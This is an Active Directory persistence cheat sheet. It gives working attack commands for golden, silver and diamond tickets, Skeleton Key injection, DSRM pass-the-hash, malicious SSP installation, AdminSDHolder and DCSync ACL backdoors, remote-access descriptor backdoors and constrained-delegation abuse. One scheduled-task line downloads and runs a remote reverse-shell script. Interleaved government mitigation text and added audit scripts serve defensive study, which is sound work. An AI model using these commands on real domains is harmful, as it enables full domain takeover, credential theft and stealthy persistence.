Persistence

Tool - SharPersist

Install Chrome Extension For Persistence

AD DS Persistence

Insomnihack 2024

Or in French - LeHack 2023:

Golden Tickets

The krbtgt account's hash can be used to forge a TGT for any user in the domain.

It is recommended to change the krbtgt account's password twice, because the account keeps its previous password in history (see Mitigation below).

Mimikatz on the DC to get the krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

DCSync (no code execution on the target DC) to get krbtgt hash

SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

The krbtgt hash can also be dumped from NTDS.dit

Create golden ticket

Using AES keys makes the attack stealthier than using the RC4 (NTLM) hash

From any machine that can reach the DC

Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

BetterSafetyKatz

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Rubeus

Rubeus.exe golden /aes256:<krbtgt_aes256_key> /sid:<domain_sid> /ldap /user:Administrator /printcmd

Mitigation

The following security control should be implemented to mitigate a Golden Ticket:

  • Change the KRBTGT password every 12 months, or when the domain has been compromised or suspected to have been compromised. Changing the KRBTGT password will invalidate any existing Golden Tickets that are being used.

    • To effectively change the KRBTGT user object’s password hash, and invalidate any Golden Tickets, the KRBTGT password must be reset twice. This is because both the new and old KRBTGT passwords are stored by Domain Controllers such that authentication in the domain is not disrupted during a KRBTGT password change. When resetting the KRBTGT password, it is important to ensure that sufficient time is allowed between password resets to ensure the new password has had time to replicate to all Domain Controllers. For more information, see Microsoft’s guidance and PowerShell script to assist with resetting the KRBTGT password.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
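Added example, not from the original page: a check that supports the double-reset guidance above by reporting the krbtgt password age on every DC and whether the last reset has replicated everywhere before the second reset is attempted. It assumes the RSAT ActiveDirectory module on a domain-joined host; the 365-day threshold mirrors the 12-month recommendation and the one-day settling time between resets is an assumption.

```powershell
# Added example (not the page's own code): audit krbtgt reset state across all DCs.
Import-Module ActiveDirectory

function Test-KrbtgtResetState {
    param([int]$MaxAgeDays = 365, [int]$MinDaysBetweenResets = 1)

    $dcs = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName
    # Query each DC directly (-Server) so we see its own copy, not whichever DC answers first
    $perDc = foreach ($dc in $dcs) {
        $k = Get-ADUser -Identity krbtgt -Server $dc -Properties PasswordLastSet
        [pscustomobject]@{
            DC              = $dc
            PasswordLastSet = $k.PasswordLastSet
            AgeDays         = [int]((Get-Date) - $k.PasswordLastSet).TotalDays
        }
    }
    # Every DC must report the same PasswordLastSet: a DC still holding the previous key
    # would break Kerberos for the clients it serves once the second reset pushes that key out
    $distinct = @($perDc.PasswordLastSet | Sort-Object -Unique).Count
    $newest   = ($perDc | Measure-Object -Property AgeDays -Minimum).Minimum
    $oldest   = ($perDc | Measure-Object -Property AgeDays -Maximum).Maximum

    [pscustomobject]@{
        PerDC           = $perDc
        FullyReplicated = ($distinct -eq 1)
        OldestAgeDays   = $oldest
        ResetOverdue    = ($oldest -gt $MaxAgeDays)
        SecondResetSafe = ($distinct -eq 1) -and ($newest -ge $MinDaysBetweenResets)
    }
}

$state = Test-KrbtgtResetState
$state.PerDC | Format-Table -AutoSize
$state | Select-Object FullyReplicated, OldestAgeDays, ResetOverdue, SecondResetSafe
```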

Silver Tickets

Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS), encrypted and signed with the hash of the service account (a golden ticket is signed with the krbtgt hash)

Ex 1 : Access to file system on the DC

Using an AES key is stealthier than using the RC4 hash

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Can be used for other services: HOST, RPCSS, HTTP, etc.

List of SPNs: https://adsecurity.org/?page_id=183

Ex: HTTP With Rubeus

Rubeus.exe silver /service:http/dc.domain.local /rc4:<rc4_key_service_account> /sid:<domain_sid> /ldap /user:Administrator /domain:domain.local /ptt

Ex 2 : Achieve command execution using silver ticket

The HOST SPN allows us to schedule a task on the target

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Schedule and execute a task

schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net.WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\""

schtasks /Run /S dc.domain.local /TN "STCheck"

Mitigation

The following security controls should be implemented to mitigate a Silver Ticket:

  • Create User objects with SPNs as group Managed Service Accounts (gMSAs). gMSAs have automatic password rotation, a 120-character password and simplified SPN management. These security features protect the password from being cracked, reducing the likelihood of a successful Silver Ticket. However, if creating user objects with SPNs as gMSAs is not feasible, ensure a minimum 30-character password that is unique, unpredictable and managed is set.

  • Change all computer object (including Domain Controller) passwords every 30 days. Malicious actors can establish persistence in Active Directory using a computer object’s password; ensuring all computer object passwords (including Domain Controller passwords) are changed every 30 days can mitigate this persistence technique.

  • Ensure computer objects are not members of privileged security groups, such as the Domain Admins security group. If malicious actors obtain a computer object’s password hash, then they gain any privileges the computer object has in the domain.

  • Ensure the Domain Computers security group does not have write or modify permissions to any objects in Active Directory. All computer objects are members of the Domain Computers security group. If this security group has rights over other objects, then malicious actors can use these rights to compromise other objects and potentially escalate their privileges and perform lateral movement.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Diamond Tickets

Decrypt a valid TGT, modify it and re-encrypt it with the krbtgt key

More OPSEC-safe than a golden ticket

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Use the /tgtdeleg option instead of credentials when already running in the context of a domain user

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /tgtdeleg /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Skeleton Key

Patch a DC (lsass process) so that it allows access as any user with a single password

Skeleton Key is not OPSEC safe and is known to cause issues with AD CS

Inject a skeleton key (password is mimikatz) on a DC.

DA privileges required

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local

Now we can authenticate to any machine as any user with a valid username and the password "mimikatz"

Enter-PSSession -Computername dc -Credential domain\Administrator

If lsass is running as a protected process (PPL), mimidrv.sys must be present on disk on the target DC

Very noisy in logs: a service installation (kernel-mode driver) is recorded

mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-

Modify the default key

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c#L611

For example, to use "S3c3rtP@ss", compute its NTLM (RC4) hash and split it into four 8-hex-digit chunks:

56aa742a
6bebb9ca
62fc9f70
a2e00cd3

Reverse the byte order within each chunk (swap the 2-hex-digit pairs end to end):

2a74aa56
cab9eb6b
709ffc62
d30ce0a2

Prepend 0x to each value and modify the kiwiKey array in the code linked above:

DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2};

Mitigation

The following security controls should be implemented to mitigate Skeleton Key:

  • Limit access to Domain Controllers to only privileged users that require access. This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.

  • Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration. Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.

  • Run the LSASS process in protected mode. This makes it more difficult to override the LSASS process, which is required for Skeleton Key to succeed.

  • Implement Microsoft’s vulnerable driver blocklist. Restricting known malicious or vulnerable drivers on Domain Controllers makes it more difficult for malicious actors to bypass LSASS protection.

  • Restrict driver execution to an approved set. Restricting the drivers that can be loaded on Domain Controllers to an approved set hardens it against attempts to bypass LSASS protection. This can be achieved through application control solutions, including Microsoft’s Windows Defender Application Control.

  • Only use Domain Controllers for AD DS and do not install any non-security-related services or applications. This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.

  • Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity. Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.

  • Disable the Print Spooler service on Domain Controllers. For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

DSRM - Directory Services Restore Mode

Every DC has a local "Administrator" account whose password is the DSRM password. The DSRM password is set when a server is promoted to a DC and is rarely changed afterwards

Dump the DSRM password hash (DA privileges needed)

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

Compare this local Administrator hash with the domain Administrator hash returned by the command below

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dc

The logon behaviour for the DSRM account must be changed before passing the hash

Enter-PSSession -Computername dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

or

Invoke-Command -ComputerName dc -ScriptBlock {
    New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
}

Pass the hash

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm:<dsrm_hash> /run:powershell.exe"'

ls \\dc\C$

To use PSRemoting, we must force NTLM authentication:

Enter-PSSession -ComputerName dc -Authentication Negotiate

Custom SSP

A Security Support Provider (SSP) is a DLL that provides ways for an application to obtain an authenticated session. Examples: NTLM, Kerberos, WDigest, CredSSP

Mimikatz's mimilib.dll is a custom SSP that logs local logons, service account passwords and machine account passwords in clear text on the target server

All local logons on the DC are logged to C:\Windows\system32\mimilsa.log or C:\Windows\system32\kiwissp.log

Way 1

Drop mimilib.dll into System32 and add "mimilib" to the Security Packages value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

Way 2

Inject into lsass

Not stable on Server 2019 and Server 2022

Invoke-Mimikatz -Command '"misc::memssp"'
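Added example, not from the original page: one audit that runs on every DC and reports the host-level indicators behind the Skeleton Key, DSRM and custom SSP techniques above (LSASS not protected, DsrmAdminLogonBehavior set to 2, unexpected Security Packages, mimilib log files, unsigned modules in LSASS). It assumes the RSAT ActiveDirectory module, PS Remoting to each DC and Domain Admin rights; the package allow-list is an assumed default-install baseline.

```powershell
# Added example (not the page's own code): LSA persistence audit across all DCs.
Import-Module ActiveDirectory

# Assumed baseline for a default install; extend it with packages you deploy (e.g. CredSSP)
$KnownPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')

$collect = {
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    function Get-RegValue($Path, $Name) {
        (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
    }
    # Modules loaded into LSASS whose Authenticode signature is not valid (mimilib.dll is unsigned)
    $badModules = Get-Process -Name lsass | Select-Object -ExpandProperty Modules |
        Where-Object { (Get-AuthenticodeSignature -FilePath $_.FileName).Status -ne 'Valid' } |
        Select-Object -ExpandProperty FileName
    [pscustomobject]@{
        DC                     = $env:COMPUTERNAME
        RunAsPPL               = Get-RegValue $lsa 'RunAsPPL'                # 1 or 2 = LSASS runs protected
        DsrmAdminLogonBehavior = Get-RegValue $lsa 'DsrmAdminLogonBehavior'  # 2 = DSRM admin usable over the network
        SecurityPackages       = @(Get-RegValue $lsa 'Security Packages') +
                                 @(Get-RegValue "$lsa\OSConfig" 'Security Packages') | Where-Object { $_ }
        SspLogFiles            = Get-ChildItem "$env:SystemRoot\System32\mimilsa.log",
                                               "$env:SystemRoot\System32\kiwissp.log" -ErrorAction SilentlyContinue |
                                 Select-Object -ExpandProperty FullName
        UnsignedLsassModules   = $badModules
    }
}

$dcs = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName
foreach ($r in Invoke-Command -ComputerName $dcs -ScriptBlock $collect) {
    $findings = @()
    if ($r.RunAsPPL -notin 1, 2)         { $findings += 'LSASS is not a protected process (RunAsPPL unset)' }
    if ($r.DsrmAdminLogonBehavior -eq 2) { $findings += 'DsrmAdminLogonBehavior=2: DSRM Administrator can log on over the network' }
    $rogue = @($r.SecurityPackages) | Where-Object { $KnownPackages -notcontains $_.ToLower() }
    if ($rogue)                          { $findings += "Unexpected Security Packages: $($rogue -join ', ')" }
    if ($r.SspLogFiles)                  { $findings += "mimilib log file present: $($r.SspLogFiles -join ', ')" }
    if ($r.UnsignedLsassModules)         { $findings += "Unsigned module in LSASS: $($r.UnsignedLsassModules -join ', ')" }
    $summary = if ($findings) { $findings -join '; ' } else { 'none' }
    [pscustomobject]@{ DC = $r.DC; Findings = $summary }
}
```

A DsrmAdminLogonBehavior value of 1 (logon allowed only while AD DS is stopped) is not flagged here; add it if your baseline expects the value to be absent.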

AdminSDHolder

The Security Descriptor Propagator (SDProp) runs every hour, compares the ACL of protected groups and their members with the ACL of the AdminSDHolder object, and overwrites any differences on the object's ACL

Well-known abuses of Protected Groups

https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf

Protected Group - Abuse

Account Operators - Can modify DA/EA/BA groups. Can modify nested groups within these groups

Backup Operators - Backup a GPO, edit it to add the SID of a controlled account to a privileged group, and restore it

Server Operators - Run a command as SYSTEM (using the disabled Browser service)

Print Operators - Copy an ntds.dit backup, load device drivers

Group Privileges

Add FullPermissions to a user

With DA privileges, AdminSDHolder can be used as a backdoor/persistence mechanism by granting a user Full Permissions on the AdminSDHolder object

With PowerView

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -Verbose

Other permissions: ResetPassword, WriteMembers

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

Run SDProp manually

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

For pre-Server 2008:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Check Domain Admins permission

PowerView

Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "username"}

AD Module

(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'}

Exploit

FullControl

PowerView

Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

AD Module

Add-ADGroupMember -Identity 'Domain Admins' -Members testda

ResetPassword

PowerView

Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

AD Module

Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Rights Abuse

With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync

FullControl

Add FullControl rights:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADACL -SAMAccountName username -Right GenericAll -DistinguishedName 'DC=domain,DC=local' -Verbose

DCSync

Add rights for DCSync:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADACL -SAMAccountName username -GUIDRight DCSync -DistinguishedName 'DC=domain,DC=local' -Verbose

Execute DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
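Added example, not from the original page: an ACL review covering both the AdminSDHolder backdoor and the domain-root rights abuse above. It lists every allow ACE on AdminSDHolder and on the domain root that grants GenericAll, WriteDacl, WriteOwner or the DCSync replication rights, and flags trustees outside an assumed default set. It assumes the RSAT ActiveDirectory module and the AD: drive it provides.

```powershell
# Added example (not the page's own code): find dangerous ACEs on AdminSDHolder and the domain root.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$DcsyncGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)
# Assumed trustees that legitimately hold these rights; add your own (e.g. an Azure AD Connect account)
$nb = $domain.NetBIOSName
$Expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', "$nb\Domain Admins", "$nb\Enterprise Admins",
              "$nb\Domain Controllers", 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
              "$nb\Enterprise Read-only Domain Controllers")

function Get-DangerousAce {
    param([string]$DistinguishedName)
    foreach ($ace in (Get-Acl -Path "AD:\$DistinguishedName").Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()
        # ExtendedRight with an empty ObjectType covers all extended rights, DCSync included
        $isDcsync = ($rights -match 'ExtendedRight') -and
                    ($ace.ObjectType -eq [guid]::Empty -or $DcsyncGuids -contains $ace.ObjectType.ToString())
        $isFull   = $rights -match 'GenericAll|WriteDacl|WriteOwner'
        if (-not ($isDcsync -or $isFull)) { continue }
        $right = if ($isFull) { $rights } else { 'DCSync' }
        [pscustomobject]@{
            Object     = $DistinguishedName
            Trustee    = $ace.IdentityReference.Value
            Right      = $right
            Inherited  = $ace.IsInherited
            Unexpected = ($Expected -notcontains $ace.IdentityReference.Value)
        }
    }
}

@("CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)", $domain.DistinguishedName) |
    ForEach-Object { Get-DangerousAce -DistinguishedName $_ } |
    Sort-Object Unexpected -Descending |
    Format-Table Object, Trustee, Right, Inherited, Unexpected -AutoSize
```

Because SDProp copies the AdminSDHolder ACL onto every protected group and member, an unexpected trustee on AdminSDHolder will also show up on Domain Admins after the next propagation run.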

Security Descriptors

Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required

With RACE toolkit: https://github.com/samratashok/RACE

WMI

On local machine for user1

Set-RemoteWMI -SamAccountName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemoteWMI -SamAccountName user1 -ComputerName dc -namespace 'root\cimv2' -Verbose

On remote machine with explicit credentials

Set-RemoteWMI -SamAccountName user1 -ComputerName dc -Credential Administrator -namespace 'root\cimv2' -Verbose

On remote machine, remove permissions

Set-RemoteWMI -SamAccountName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -Verbose

PS Remoting backdoor

Not stable after August 2020 patches

On local machine for user1

Set-RemotePSRemoting -SamAccountName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemotePSRemoting -SamAccountName user1 -ComputerName dc -Verbose

On remote machine, remove permissions

Set-RemotePSRemoting -SamAccountName user1 -ComputerName dc -Remove

Remote Registry

With DAMP

Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -Verbose

As user1, retrieve the machine account hash (usable for a silver ticket attack)

Get-RemoteMachineAccountHash -ComputerName dc -Verbose

Retrieve local account hash

Get-RemoteLocalAccountHash -ComputerName dc -Verbose

Retrieve domain cached credentials

Get-RemoteCachedCredential -ComputerName dc -Verbose
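Added example, not from the original page: a check for the WMI and PS Remoting security-descriptor backdoors above. It reports every trustee in the DACL of each PS Remoting session configuration and of the root\cimv2 WMI namespace on a DC, flagging any outside an assumed admin baseline. It assumes PS Remoting to the DC with admin rights; 'dc.domain.local' is a placeholder and the baseline list is an assumption. The DAMP remote-registry backdoor is not covered.

```powershell
# Added example (not the page's own code): who can use PS Remoting and WMI on a DC?
$ComputerName = 'dc.domain.local'   # placeholder
$Baseline = @('BUILTIN\Administrators', 'BUILTIN\Remote Management Users', 'NT AUTHORITY\SYSTEM',
              'NT AUTHORITY\INTERACTIVE', 'NT AUTHORITY\NETWORK SERVICE', 'NT AUTHORITY\LOCAL SERVICE')

function Get-RemoteAccessTrustee {
    param([string]$ComputerName, [string[]]$Baseline)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $baseline = $using:Baseline

        # PS Remoting: each session configuration has its own DACL (this is what Set-RemotePSRemoting edits).
        # ConvertFrom-SddlString yields entries like "DOMAIN\user: AccessAllowed (GenericAll, ...)"
        foreach ($cfg in Get-PSSessionConfiguration) {
            if (-not $cfg.SecurityDescriptorSddl) { continue }
            foreach ($entry in (ConvertFrom-SddlString -Sddl $cfg.SecurityDescriptorSddl).DiscretionaryAcl) {
                $parts = $entry -split ': ', 2
                [pscustomobject]@{
                    Surface    = "PSRemoting/$($cfg.Name)"
                    Trustee    = $parts[0]
                    Access     = $parts[1]
                    Unexpected = ($baseline -notcontains $parts[0])
                }
            }
        }

        # WMI: namespace security lives on the __SystemSecurity object (this is what Set-RemoteWMI edits).
        # AccessMask bit 0x20 is WBEM_REMOTE_ACCESS, the right needed to use the namespace over the network
        $sd = (Invoke-WmiMethod -Namespace 'root\cimv2' -Path '__SystemSecurity=@' -Name GetSecurityDescriptor).Descriptor
        foreach ($ace in $sd.DACL) {
            $trustee = if ($ace.Trustee.Domain) { "$($ace.Trustee.Domain)\$($ace.Trustee.Name)" } else { $ace.Trustee.Name }
            $kind    = if ($ace.AceType -eq 0) { 'AccessAllowed' } else { 'AccessDenied' }
            $remote  = if ($ace.AccessMask -band 0x20) { 'RemoteEnable' } else { 'local only' }
            [pscustomobject]@{
                Surface    = 'WMI/root\cimv2'
                Trustee    = $trustee
                Access     = "$kind mask=0x{0:X} ($remote)" -f $ace.AccessMask
                Unexpected = ($baseline -notcontains $trustee)
            }
        }
    }
}

Get-RemoteAccessTrustee -ComputerName $ComputerName -Baseline $Baseline |
    Sort-Object Unexpected -Descending |
    Format-Table Surface, Trustee, Unexpected, Access -AutoSize
```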

msDS-AllowedToDelegateTo

Requires SeEnableDelegationPrivilege on the DC and full rights on the target user; Domain Admins and Enterprise Admins have both by default

With Powershell

# PowerView

Set-DomainObject -Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject -Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"}
Set-DomainObject -Identity devuser -XOR @{"useraccountcontrol"="16777216"}

Get-DomainUser -TrustedToAuth

# AD Module

Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'}
Set-ADUser -Identity devuser -Add @{'msDS-AllowedToDelegateTo'=@('ldap/dc','ldap/dc.domain.local')} -Verbose
Set-ADAccountControl -Identity devuser -TrustedToAuthForDelegation $true

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

With Kekeo

kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword!

kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

With Rubeus

# Get RC4 hash
Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local

Rubeus.exe s4u /user:devuser /rc4:<rc4_hash> /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt

SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
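Added example, not from the original page: an audit for the constrained-delegation persistence above. It enumerates every account with protocol transition enabled (the TRUSTED_TO_AUTH_FOR_DELEGATION bit set via -XOR 16777216 above) or with msDS-AllowedToDelegateTo populated, and flags entries whose target SPNs point at a Domain Controller, which is the case that leads to DCSync. It assumes the RSAT ActiveDirectory module on a domain-joined host.

```powershell
# Added example (not the page's own code): find delegation settings that reach a DC.
Import-Module ActiveDirectory

$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # 16777216, the userAccountControl bit toggled above

# Host names (short and FQDN) of every DC, lower-cased for comparison
$dcHosts = Get-ADDomainController -Filter * |
    ForEach-Object { $_.HostName.ToLower(); $_.Name.ToLower() }

function Get-DelegationRisk {
    $filter = "(|(msDS-AllowedToDelegateTo=*)" +
              "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_TO_AUTH_FOR_DELEGATION))"
    Get-ADObject -LDAPFilter $filter -Properties msDS-AllowedToDelegateTo, userAccountControl, whenChanged |
        ForEach-Object {
            $targets = @(@($_.'msDS-AllowedToDelegateTo') | Where-Object { $_ })
            # An SPN is class/host[:port][/name]; compare only the host part against the DC list
            $dcTargets = $targets | Where-Object {
                $spnHost = (($_ -split '/')[1] -split ':')[0]
                $dcHosts -contains $spnHost.ToLower()
            }
            [pscustomobject]@{
                Account            = $_.Name
                Class              = $_.ObjectClass
                ProtocolTransition = [bool]($_.userAccountControl -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
                DelegatesTo        = ($targets -join ', ')
                TargetsDC          = [bool]$dcTargets
                LastChanged        = $_.whenChanged
            }
        }
}

Get-DelegationRisk | Sort-Object TargetsDC, ProtocolTransition -Descending | Format-Table -AutoSize
```

A user account (not a computer) with ProtocolTransition true and TargetsDC true is the exact shape the devuser example above creates; whenChanged narrows down when it was introduced.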
